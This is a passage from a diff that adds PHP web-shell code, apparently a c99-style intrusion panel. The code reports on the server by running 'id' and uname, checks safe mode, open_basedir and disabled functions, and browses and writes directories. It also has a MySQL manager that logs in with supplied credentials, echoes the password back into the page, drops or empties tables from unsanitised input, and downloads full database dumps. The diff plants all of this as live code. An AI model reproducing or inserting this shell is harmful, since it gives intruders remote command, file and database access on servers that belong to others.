+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  ## HEADERS ##
+  @ob_start();
+  @ob_implicit_flush(0);
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = @urlencode($d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+  $safemode = safemode();
+  if ($safemode) {
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE IS ON</b></font>";
+    $safemodeexecdir = @ini_get("safe_mode_exec_dir");
+  }
+  else { $hsafemode = "<font color=#FF9900><b>SAFE MODE IS OFF</b></font>"; }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  
+##################
+##[ HTML START ]##
+##################
+function srv_info($title,$contents) {
+  echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
+}
+echo htmlhead($hsafemode);
+echo "<table id=pagebar>";
+echo "<tr><td colspan=2>\n";
+echo "<div class=fleft>$hsafemode</div>\n";
+echo "<div class=fright>";
+echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
+     "You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
+     ($win?"Drives: ".disp_drives($d,$surl):"");
+echo "</div>\n</td></tr>\n";
+echo "<tr><td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Software","".$DISP_SERVER_SOFTWARE);
+srv_info("Uname",php_uname());
+srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : fx29exec("id"));
+echo "</table></td>\n".
+     "<td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Freespace",disp_freespace($d));
+echo "</table></td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo get_status();
+echo "</td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
+echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : "";
+echo "</td></tr>\n";
+echo "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td>\n".
+     "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr>\n<tr><td colspan=2>";
+echo "<p class=fleft>\n";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+echo "\n</p>\n";
+?>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+/***********************/
+/** INFORMATION TABLE **/
+/***********************/
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! MySQL Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
